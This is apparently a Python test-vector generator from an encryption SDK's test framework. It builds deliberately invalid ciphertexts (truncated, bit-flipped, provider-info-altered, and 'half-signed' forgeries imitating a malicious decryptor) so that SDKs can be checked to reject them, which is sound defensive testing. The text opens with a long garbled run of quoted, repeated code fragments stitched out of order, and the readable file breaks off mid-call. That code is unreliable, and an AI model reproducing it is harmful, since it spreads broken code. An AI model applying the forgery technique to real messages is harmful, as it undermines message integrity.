\"\"\"", "Number of spaces to indent JSON files (optional: default is", "MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ]", "checks pass SUPPORTED_VERSIONS = (2,) class TamperingMethod: \"\"\"Base class for", "DecryptionMethod(decryption_method_spec) if decryption_method_spec else None if \"decryption-master-keys\" in scenario: decryption_master_key_specs", "decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod)))", "{}\".format(length)), ) for length in range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod):", "in the given ciphertext\"\"\" byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result", "should never be used in production! It is imitating what", "MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for bit in range(0, len(ciphertext_to_decrypt) *", "with tampering for a specific new provider info value\"\"\" tampering_materials_manager", "a given scenario, tampering with the input or the result.", "decryption_method_spec else None if \"decryption-master-keys\" in scenario: decryption_master_key_specs = [", "the given ciphertext\"\"\" byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result =", "= \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) -> Dict[str,", "MasterKeySpec, master_key_provider_from_master_key_specs try: # Python 3.5.0 and 3.5.1 have incompatible", "an important case for ESDKs to reject. 
\"\"\" wrapped_default_cmm =", "noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError: # pragma:", "decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult)))", "new_provider_info in self.new_provider_infos ] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager,", "except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self,", "for a specific new provider info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager,", "result.signing_key = None return result raise NotImplementedError( \"The half-sign tampering", "result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None return cls(", "from awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite except", "only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def", "\"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit),", "result = bytearray(ciphertext) result[byte_index] ^= 1 << (BITS_PER_BYTE - bit_index", "new provider info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt =", "flip_bit(cls, ciphertext, bit): \"\"\"Flip only the given bit in the", "size in bytes :return: Mapping of plaintext name to randomly", "ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result else: expected_result", "ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), ) for length in range(1,", "{ decrypt_scenario_name: decrypt_scenario for name, scenario in self.tests.items() for decrypt_scenario_name,", "half-sign tampering method is only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY", "bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for bit in range(0, len(ciphertext_to_decrypt)", "TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for bit in range(0,", "Custom CMM that generates materials for an unsigned algorithm suite", "(optional: default is to write minified) \"\"\" root_dir = os.path.abspath(target_directory)", "LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, ) return", "{} for name, scenario in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario(", "CREATE INVALID MESSAGES and should never be used in production!", "in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return result def decrypt_materials(self, request):", "): \"\"\"Run with tampering for a specific new provider info", 
"ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that generates", "os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest)", "= HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error(", "return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):", "if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384", "Amazon.com, Inc. or its affiliates. All Rights Reserved. # #", "the wrapped CMM, and then change the provider info on", "encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec,", "unsigned message from a decrypted signed message, and therefore this", "decryptor without encryption permissions might do, to attempt to forge", "is only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" )", "= file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts =", "file. This file is # distributed on an \"AS IS\"", "\"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM to", "for a given new provider info value.\"\"\" self.new_provider_infos = new_provider_infos", "ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info on all", "from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults", "Inc. or its affiliates. All Rights Reserved. # # Licensed", "of this manifest :param KeysManifest keys: Loaded keys :param dict", "return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self, target_directory, json_indent=None): #", "((tampering_tag, tampering_values_spec),) = spec.items() if tampering_tag == \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec)", "that describes the matching decrypt scenario. :param callable ciphertext_writer: Callable", "should never be used in production! 
\"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))", "generation_scenario, materials_manager, new_provider_info ): \"\"\"Run with tampering for a specific", "master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else: decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec", "truncates a good message at every byte (except zero).\"\"\" #", "Optional[int]) -> None \"\"\"Process all known encrypt test scenarios and", "MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), ) for length in range(1, len(ciphertext_to_decrypt))", "is # distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES", "the given CMM.\"\"\" self.wrapped_cmm = materials_manager self.new_provider_info = new_provider_info def", "IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND,", "from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec,", "and should never be used in production! \"\"\" wrapped_cmm =", "TO CREATE INVALID MESSAGES and should never be used in", "test scenario that describes the generated scenario :rtype: MessageDecryptionTestScenario \"\"\"", "parameters :param tampering_method: Optional method used to tamper with the", "full message decrypt test scenario. Handles serialization and deserialization to", "test scenario. Handles serialization and deserialization to and from manifest", "names to plaintext values :return: Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator", "result. return: a list of (ciphertext, result) pairs. \"\"\" master_key_provider", "if \"decryption-master-keys\" in scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for spec", "result) pairs. \"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching", "scenario, writing the resulting ciphertext with ``ciphertext_writer`` and returning a", "info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result", "awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt", "( # noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError:", "object for file containing JSON manifest :return: Loaded manifest :rtype:", "on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def decrypt_materials(self, request):", "from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default", "provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\" Generate", "None return result raise NotImplementedError( \"The half-sign tampering method is", "teh result. 
\"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request)", "tampering method tag: \" + tampering_tag) # pylint: disable=R0201 def", "[ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for", "CONDITIONS OF # ANY KIND, either express or implied. See", "tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error(", "def run_and_write_to_dir(self, target_directory, json_indent=None): # type: (str, Optional[int]) -> None", "def decrypt_materials(self, request): \"\"\"Thunks to the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request)", "MESSAGES and should never be used in production! It is", "a list of (ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()", "generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key provider info:", "at every byte (except zero).\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self,", "keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types,", "Encryption SDK Decrypt Message Generation. :param int version: Version of", "= generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM to avoid generating", ":param decryption_method: :param decryption_master_key_specs: Iterable of master key specifications :type", "type: (PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate required plaintext values. :param", "TruncateTamperingMethod() if spec == \"mutate\": return MutateTamperingMethod() if spec ==", "MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite", "then changing the algorithm suite and removing the signing key", "ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s class", "encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer,", "File object for file containing JSON manifest :return: Loaded manifest", "serialization and deserialization to and from manifest specs. 
:param MessageEncryptionTestScenario", "def from_tampering_spec(cls, spec): \"\"\"Load from a tampering specification\"\"\" if spec", "master_key_provider): \"\"\" Create a new CMM that wraps a new", "WARRANTIES OR CONDITIONS OF # ANY KIND, either express or", "\"\"\" Generate half-signing materials by requesting signing materials from the", "minified) \"\"\" root_dir = os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec,", "for a single full message decrypt test scenario. Handles serialization", "given ciphertext\"\"\" byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext)", "return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items() if tampering_tag == \"change-edk-provider-info\":", "written data :param str plaintext_uri: URI locating the written plaintext", "self.new_provider_infos = new_provider_infos @classmethod def from_values_spec(cls, values_spec): \"\"\"Load from a", "plaintext_uri): \"\"\"Run this scenario, writing the resulting ciphertext with ``ciphertext_writer``", "public key\" ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class", "scenario in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts", ":param tampering_method: Optional method used to tamper with the ciphertext", "Run a given scenario, tampering with the input or the", "a caching CMM to avoid generating a new data key", "aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util import", "with the License. A copy of # the License is", "= materials_manager self.new_provider_info = new_provider_info def get_encryption_materials(self, request): \"\"\" Request", "BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either", "] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info ): \"\"\"Run", "is located at # # http://aws.amazon.com/apache2.0/ # # or in", "awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError:", "SDK Decryption Message Generation manifest handler. 
Described in AWS Crypto", "return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom", "= scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\") decryption_method =", "dict tests: Mapping of test scenario names to :class:`MessageDecryptionGenerationManifest`s \"\"\"", "plaintext_uris = {name: plaintext_writer(name, plaintext) for name, plaintext in self.plaintexts.items()}", "TamperingMethod() if spec == \"truncate\": return TruncateTamperingMethod() if spec ==", "requesting signing materials from the wrapped default CMM, and then", "Callable that will write the requested named ciphertext and return", "import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager", "-> MessageDecryptionGenerationManifest \"\"\"Load from a file containing a full message", "MutateTamperingMethod() if spec == \"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) =", "self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates", "import KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError: from", "bit_index - 1) return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that", "scenario. Handles serialization and deserialization to and from manifest specs.", ") from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try:", "= new_provider_infos @classmethod def from_values_spec(cls, values_spec): \"\"\"Load from a tampering", "governing permissions and limitations under the License. \"\"\" AWS Encryption", "AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm result.signing_key = None", "randomly generated bytes :rtype: dict \"\"\" return {name: os.urandom(size) for", "= 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates a good", "file containing a full message encrypt manifest. :param file input_file:", "copy of # the License is located at # #", "@classmethod def from_tampering_spec(cls, spec): \"\"\"Load from a tampering specification\"\"\" if", "of test scenario names to :class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS))", "containing JSON manifest :return: Loaded manifest :rtype: MessageEncryptionManifest \"\"\" raw_manifest", "License. 
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""
AWS Encryption SDK Decrypt Message Generation manifest handler.

Described in AWS Crypto Tools Test Vector Framework feature #0006 AWS Encryption SDK Decrypt Message Generation.
"""
import json
import os
import uuid
from copy import copy

import attr
import six
from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache
from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite
from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager
from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager
from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager

from awses_test_vectors.internal.defaults import ENCODING
from awses_test_vectors.internal.util import (
    dictionary_validator,
    file_reader,
    file_writer,
    iterable_validator,
    membership_validator,
    validate_manifest_type,
)
from awses_test_vectors.manifests.full_message.decrypt import (
    DecryptionMethod,
    MessageDecryptionManifest,
    MessageDecryptionTestResult,
    MessageDecryptionTestScenario,
)
from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario
from awses_test_vectors.manifests.keys import KeysManifest
from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs

try:  # Python 3.5.0 and 3.5.1 have incompatible typing modules
    from typing import IO, Callable, Dict, Iterable, Optional  # noqa pylint: disable=unused-import

    from awses_test_vectors.internal.mypy_types import (  # noqa pylint: disable=unused-import
        ENCRYPT_SCENARIO_SPEC,
        PLAINTEXTS_SPEC,
    )
except ImportError:  # pragma: no cover
    # We only need these imports when running the mypy checks
    pass

SUPPORTED_VERSIONS = (2,)


class TamperingMethod:
    """Base class for all tampering methods."""

    @classmethod
    def from_tampering_spec(cls, spec):
        """Load from a tampering specification"""
        if spec is None:
            return TamperingMethod()
        if spec == "truncate":
            return TruncateTamperingMethod()
        if spec == "mutate":
            return MutateTamperingMethod()
        if spec == "half-sign":
            return HalfSigningTamperingMethod()
        ((tampering_tag, tampering_values_spec),) = spec.items()
        if tampering_tag == "change-edk-provider-info":
            return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec)
        raise ValueError("Unrecognized tampering method: {}".format(tampering_tag))

    # pylint: disable=R0201
    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs
        """
        materials_manager = DefaultCryptoMaterialsManager(
            generation_scenario.encryption_scenario.master_key_provider_fn()
        )
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager)
        if generation_scenario.result:
            expected_result = generation_scenario.result
        else:
            expected_result = MessageDecryptionTestResult.expect_output(
                plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext
            )
        return [generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)]


class ChangeEDKProviderInfoTamperingMethod(TamperingMethod):
    """Tampering method that changes the provider info on all EDKs."""

    new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types))

    def __init__(self, new_provider_infos):
        """Create a new instance for a given list of new provider infos."""
        self.new_provider_infos = new_provider_infos

    @classmethod
    def from_values_spec(cls, values_spec):
        """Load from a tampering parameters specification"""
        return ChangeEDKProviderInfoTamperingMethod(values_spec)

    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs.
        """
        master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn()
        # Use a caching CMM to avoid generating a new data key every time.
        cache = LocalCryptoMaterialsCache(10)
        caching_cmm = CachingCryptoMaterialsManager(
            master_key_provider=master_key_provider,
            cache=cache,
            max_age=60.0,
            max_messages_encrypted=100,
        )
        return [
            self.run_scenario_with_new_provider_info(
                ciphertext_writer, generation_scenario, caching_cmm, new_provider_info
            )
            for new_provider_info in self.new_provider_infos
        ]

    def run_scenario_with_new_provider_info(
        self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info
    ):
        """Run with tampering for a specific new provider info value"""
        tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info)
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)
        expected_result = MessageDecryptionTestResult.expect_error(
            "Incorrect encrypted data key provider info: " + new_provider_info
        )
        return generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)


class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager):
    """
    Custom CMM that modifies the provider info field on EDKs.

    THIS IS ONLY USED TO CREATE INVALID MESSAGES and should never be used in production!
    """

    wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))
    new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types))

    def __init__(self, materials_manager, new_provider_info):
        """Create a new CMM that wraps the given CMM."""
        self.wrapped_cmm = materials_manager
        self.new_provider_info = new_provider_info

    def get_encryption_materials(self, request):
        """
        Request materials from the wrapped CMM, and then change the provider info
        on each EDK.
        """
        result = self.wrapped_cmm.get_encryption_materials(request)
        for encrypted_data_key in result.encrypted_data_keys:
            encrypted_data_key.key_provider.key_info = self.new_provider_info
        return result

    def decrypt_materials(self, request):
        """Thunks to the wrapped CMM"""
        return self.wrapped_cmm.decrypt_materials(request)


BITS_PER_BYTE = 8


class TruncateTamperingMethod(TamperingMethod):
    """Tampering method that truncates a good message at every byte (except zero)."""

    # pylint: disable=R0201
    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs.
        """
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()
        return [
            generation_scenario.decryption_test_scenario_pair(
                ciphertext_writer,
                ciphertext_to_decrypt[0:length],
                MessageDecryptionTestResult.expect_error("Truncated at byte {}".format(length)),
            )
            for length in range(1, len(ciphertext_to_decrypt))
        ]

    @classmethod
    def flip_bit(cls, ciphertext, bit):
        """Flip only the given bit in the given ciphertext"""
        byte_index, bit_index = divmod(bit, BITS_PER_BYTE)
        result = bytearray(ciphertext)
        result[byte_index] ^= 1 << (BITS_PER_BYTE - bit_index - 1)
        return bytes(result)


class MutateTamperingMethod(TamperingMethod):
    """Tampering method that produces a message with a single bit flipped, for every possible bit."""

    # pylint: disable=R0201
    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs.
        """
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()
        return [
            generation_scenario.decryption_test_scenario_pair(
                ciphertext_writer,
                TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit),
                MessageDecryptionTestResult.expect_error("Bit {} flipped".format(bit)),
            )
            for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE)
        ]


class HalfSigningTamperingMethod(TamperingMethod):
    """Tampering method that changes a signed message into an unsigned one, reusing the signed suite's materials."""

    # pylint: disable=R0201
    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs.
        """
        tampering_materials_manager = HalfSigningCryptoMaterialsManager(
            generation_scenario.encryption_scenario.master_key_provider_fn()
        )
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)
        expected_result = MessageDecryptionTestResult.expect_error(
            "Unsigned message using a data key with a public key"
        )
        return [
            generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)
        ]


class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager):
    """
    Custom CMM that generates materials for an unsigned algorithm suite
    that includes the "aws-crypto-public-key" encryption context.

    THIS IS ONLY USED TO CREATE INVALID MESSAGES and should never be used in
    production! It is imitating what a malicious decryptor without encryption
    permissions might do, to attempt to forge an unsigned message from a decrypted
    signed message, and therefore this is an important case for ESDKs to reject.
    """

    wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))

    def __init__(self, master_key_provider):
        """
        Create a new CMM that wraps a new DefaultCryptoMaterialsManager
        based on the given master key provider.
        """
        self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider)

    def get_encryption_materials(self, request):
        """
        Generate half-signing materials by requesting signing materials
        from the wrapped default CMM, and then changing the algorithm suite
        and removing the signing key from the result.
        """
        if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY:
            signing_request = copy(request)
            signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384
            result = self.wrapped_default_cmm.get_encryption_materials(signing_request)
            result.algorithm = request.algorithm
            result.signing_key = None
            return result
        raise NotImplementedError(
            "The half-sign tampering method is only supported on the "
            "AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite."
        )

    def decrypt_materials(self, request):
        """Thunks to the wrapped default CMM"""
        return self.wrapped_default_cmm.decrypt_materials(request)


@attr.s
class MessageDecryptionTestScenarioGenerator(object):
    # pylint: disable=too-many-instance-attributes
    """
    Data class for a single full message decrypt test scenario.

    Handles serialization and deserialization to and from manifest specs.

    :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters
    :param tampering_method: Optional method used to tamper with the ciphertext
    :type tampering_method: :class:`TamperingMethod`
    :param decryption_method:
    :param decryption_master_key_specs: Iterable of master key specifications
    :type decryption_master_key_specs: iterable of :class:`MasterKeySpec`
    :param Callable decryption_master_key_provider_fn:
    :param result:
    """

    encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario))
    tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod)))
    decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod)))
    decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec))
    decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable())
    result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult)))

    @classmethod
    def from_scenario(cls, scenario, keys, plaintexts):
        """
        Load from a scenario specification.

        :param dict scenario: Scenario specification JSON
        :param KeysManifest keys: Loaded keys
        :param dict plaintexts: Mapping of plaintext names to plaintext values
        :return: Loaded test scenario
        :rtype: MessageDecryptionTestScenarioGenerator
        """
        encryption_scenario_spec = scenario["encryption-scenario"]
        encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts)
        tampering = scenario.get("tampering")
        tampering_method = TamperingMethod.from_tampering_spec(tampering)
        decryption_method_spec = scenario.get("decryption-method")
        decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else None
        if "decryption-master-keys" in scenario:
            decryption_master_key_specs = [
                MasterKeySpec.from_scenario(spec) for spec in scenario["decryption-master-keys"]
            ]

            def decryption_master_key_provider_fn():
                return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs)

        else:
            decryption_master_key_specs = encryption_scenario.master_key_specs
            decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn
        result_spec = scenario.get("result")
        result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None

        return cls(
            encryption_scenario=encryption_scenario,
            tampering_method=tampering_method,
            decryption_method=decryption_method,
            decryption_master_key_specs=decryption_master_key_specs,
            decryption_master_key_provider_fn=decryption_master_key_provider_fn,
            result=result,
        )

    def run(self, ciphertext_writer, plaintext_uri):
        """
        Run this scenario, writing the resulting ciphertext with ``ciphertext_writer`` and returning
        a :class:`MessageDecryptionTestScenario` that describes the matching decrypt scenario.

        :param ciphertext_writer: Callable that will write the requested named ciphertext and return
            a URI locating the written data
        :param plaintext_uri: URI locating the written plaintext data for this scenario
        :return: Decrypt test scenario that describes the generated scenario
        :rtype: MessageDecryptionTestScenario
        """
        return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri))

    def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result):
        """Create a new (name, decryption scenario) pair"""
        ciphertext_name = str(uuid.uuid4())
        ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt)

        return (
            ciphertext_name,
            MessageDecryptionTestScenario(
                ciphertext_uri=ciphertext_uri,
                ciphertext=ciphertext_to_decrypt,
                master_key_specs=self.decryption_master_key_specs,
